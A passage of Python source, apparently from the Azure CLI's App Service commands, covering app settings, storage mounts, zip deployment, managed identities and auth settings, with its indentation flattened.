if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed. Use 'az webapp config appsettings list --name MyWebapp --resource-group "
"MyResourceGroup --subscription MySubscription' to list app settings and 'az webapp "
"config appsettings delete --name MyWebApp --resource-group MyResourceGroup "
"--setting-names <setting-names> to delete them.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# ignore apps with kind==null & not functions apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
cmd_app_type, name, resource_group_name))
app_type = _kind_to_app_type(app.kind) if app else None
if app_type != cmd_app_type:
raise ResourceNotFoundError(
"Unable to find {app_type} '{name}', in resource group '{resource_group}'".format(
app_type=cmd_app_type, name=name, resource_group=resource_group_name),
"Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
